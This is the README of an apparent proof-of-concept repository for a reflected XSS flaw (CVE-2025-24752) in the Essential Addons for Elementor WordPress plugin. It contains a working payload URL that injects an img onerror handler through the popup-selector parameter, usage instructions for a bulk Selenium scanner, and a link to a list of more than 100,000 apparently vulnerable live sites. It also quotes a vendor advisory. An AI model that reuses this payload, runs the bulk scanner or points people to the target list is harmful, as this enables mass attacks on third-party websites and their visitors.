Hi, I am Chirag Artani. This is the POC of Reflected XSS in Essential Addons for Elementor Affecting 2+ Million Sites - CVE-2025-24752 Please do not harm sites, FIX it ASAP
targets vulnerable 100K+ probably affecting for XSS https://nt.ls/AkTE9 (can download by one click all vulnerable)
##### Requirement to run poc.py, Install -
```pip install selenium webdriver-manager```
##### Usage
```python poc.py targets.txt```
```For bulk it will take time but yes it is going to confirm the XSS, it works like browser, so yeah until XSS pop-up it waits to see and confirm.```
#### manual POC elementor XSS 2025
==> ```https://target.com/?popup-selector=<img_src=x_onerror=alert("chirag")>&eael-lostpassword=1```
Note: My script works slow, but it can 1000% confirm XSS bug unlike nuclei or httpx. I tried all the things, version below 6.0.15 are affected.
#### Information & reference
https://patchstack.com/articles/reflected-xss-patched-in-essential-addons-for-elementor-affecting-2-million-sites/
The Essential Addons for Elementor plugin suffered from a reflected cross-site scripting (XSS) vulnerability. The vulnerability occurred due to insufficient validation and sanitizing of the popup-selector query argument, allowing for a malicious value to be reflected back at the user. The vulnerability is fixed in version 6.0.15 and has been tracked with CVE-2025-24752.
[4.0K] /data/pocs/7c40ea5190254c4ad71427b745589bc0cb4271b4
├── [6.0K] poc.py
└── [1.4K] README.md
0 directories, 2 files